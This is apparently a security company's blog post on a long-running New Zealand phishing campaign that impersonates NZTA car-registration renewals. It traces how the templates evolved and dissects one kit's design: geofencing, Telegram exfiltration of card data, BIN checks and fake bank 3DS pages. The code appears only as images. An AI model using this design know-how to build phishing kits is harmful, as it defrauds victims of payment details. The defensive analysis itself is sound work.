Chris Campbell Oct 22, 2024 26 min read

The Phish that won't die

After yesterday’s post that opened our 2024 Cyber Smart Week series, it only seems fitting to continue with something that many New Zealanders will be familiar with.

Since at least late-2019, the most prominent phishing template that we have regularly seen has been car registration renewals that leverage the brand of Waka Kotahi NZ Transport Agency. Seen being distributed both through email and SMS, the numerous and frequently rampant campaigns have been reported by hundreds of thousands of New Zealanders – some of whom have fallen victim and lost life savings to them.

For such a long-lived and widely distributed lure to remain viable, it has been updated over time, keeping it relevant and introducing improvements to the underlying phishing kit. In this post we’ll look at the evolution of the NZTA registration phish and analyse a recent campaign.

Historic Templates

While the approach of the email templates has not changed, some of the minor details of them have. For example:

  • Shift from “NZ Transport Agency”, to “Waka Kotahi NZ Transport Agency” (2022), to “NZ Transport Agency Waka Kotahi” (2024).
  • Inclusion of logos and official brand colours.
  • Slight changes in layout and design, including columns and link buttons.

The design and functionality of the phishing kit itself has remained largely unchanged, only seeing minor changes such as different log output options.

Samples

December 2021:

CS blog 2 - pic 1

February 2022:

CS blog 2 - pic 2

April 2023:

CS blog 2 - pic 3

September 2023:

CS blog 2 - pic 4

January 2024:

CS blog 2 - pic 5

Campaign Analysis

Identified on 20th October 2024, the following campaign was received by several users at a customer. Thankfully, there were no victims, and we were afforded the opportunity to analyse it.

The User Experience

The email template is very similar to the one first seen in January. No images are embedded, and text formatting is used to resemble the logo. Despite what the text says, all links go to the same place:

CS blog 2 - pic 6

Clicking the link opens the default browser to the phishing kit, hosted in a subdirectory of a compromised website:

CS blog 2 - pic 7

After entering a plate number and selecting the renewal period, the user is presented with accurate details of the vehicle:

CS blog 2 - pic 8

Following the table is a summary of the renewal cost, and an option to proceed to payment or cancel. A detail to note here is that the page is dated 2021, where the legitimate page is current:

CS blog 2 - pic 9

Should the user choose to proceed, they’re presented with a standard payment form:

CS blog 2 - pic 10

Obviously, submission of credit card data would be captured in a log or sent to an external service like Telegram.

A spinning padlock icon sits on the loading page for a moment:

CS blog 2 - pic 11

Before finally landing on a 3DS page specific to the card issuer, which requests additional information to help the operators navigate potential challenges encountered when abusing the submitted card:

CS blog 2 - pic 12

Inside the Kit

Due to a lapse in operational security by the kit operator, we were able to access all server-side artifacts.

At the root of the deployment directory is an .htaccess file, used to rewrite friendly paths to specific files (e.g., VehicleLicenceEntry/ loads transact.php), and geofence the kit to NZ residential and commercial IP addresses:

CS blog 2 - pic 13

Foreign visitors are presented with a 403 HTTP response (access denied), as are most NZ VPN nodes.

Core to the kit is its configuration, which defines the parameters for logging submissions. In this case, it’s a Telegram bot key and several channel ID’s:

CS blog 2 - pic 14

While the config can also be used to constrain visitors by geolocation, the .htaccess file already addresses this with a more sledgehammer approach.

Submissions to the page are posted to “post/step1.php”, which drops a notification in the “BOT_CHAT_LOG” channel:

CS blog 2 - pic 15

The script also invokes the “get_plate_info” function found in functions.php, which makes a call out to NZTA’s “Tolling Online” API to retrieve the vehicle details for the submitted plate:

CS blog 2 - pic 16

If the results of both the Telegram submission and plate request are successful, the user is directed to the “VehicleInformation” (step2.php) page. This page renders the serialized result of the “get_plate_info” response and links the user to “PaymentGateway” (pay.php).

A trap for adventurous admins and analysts, the payment page first logs the IP of all visitors to a local file, “cc-visit.txt”:

CS blog 2 - pic 17

jQuery validation libraries validate form input and, if valid, permit postback. Based on the residual ASP.NET element names and properties, it is quite apparent that the page was constructed using a clone of the source:

CS blog 2 - pic 18

Like “post/step1.php”, “post/step2.php” also posts the form data to a Telegram channel:

CS blog 2 - pic 19

The function “is_local_bin” is called to validate the first 6 digits of the card number (the Bank Identification Number/BIN) indicate that the card was issued by a New Zealand bank:

CS blog 2 - pic 20

This relies on a web service, lookup[.]binlist[.]net:

CS blog 2 - pic 21

Following successful validation of the bin and submission to Telegram, the bank name and card type are stored as session variables, and the user is redirected to the “loading” (payment_loading.php) page. This first queries the kit config for the appropriate time to wait:

CS blog 2 - pic 22

Then redirects to the 3DS capture for the card issuer:

CS blog 2 - pic 23

The kit is bundled with templates for the main New Zealand banks:

CS blog 2 - pic 24

Looking at Kiwibank as an example, all the images necessary to emulate a Kiwibank 3DS request are included:

CS blog 2 - pic 25

These brand a page that collects the access number, date of birth and phone number of the user – as seen above:

CS blog 2 - pic 26

The collected information varies between banks.

Response Options

  • Help staff keep up to date with the latest NZTA scams. New Zealand news sites such as Stuff also tend to relay any media releases that NZTA and other government agencies publish about scams that affect them.
  • More broadly, there is no single best resource for emerging phishing. While a lot is kept within cybersecurity trust groups, X/Twitter can still be a great resource using a list like this one that I maintain.
  • Feel welcome to share some of the samples that have been provided in this blog post. Ensure you’ve set up a reporting function within your organisation and share new observations with your staff. Reward those who take the time to report phishing to you.
  • Promote awareness of DIA and CERT NZ reporting options. Remember:

CS blog 2 - pic 27

 

About the author

Chris Campbell

Chris was that notoriously disobedient kid who sat at the back of the class and always seemed bored, but somehow still managed to ace all of his exams. Obsessed with the finer details and mechanics of everything in both the physical and digital realms, Chris serves as the Principal Security Architect within the Inde Security Team. His ventures into computer security began at an early age and haven't slowed down since. After a decade spent across security and operations, and evenings spent diving into the depths of malware and operating systems, he brings a wealth of knowledge to Inde along with a uniquely adversary focused approach to defence. Like many others at Inde, Chris likes to unwind by hitting the bike trails or pretending to be a BBQ pitmaster. He is also heavily involved in the leadership of security events, trust groups and research projects.

COMMENTS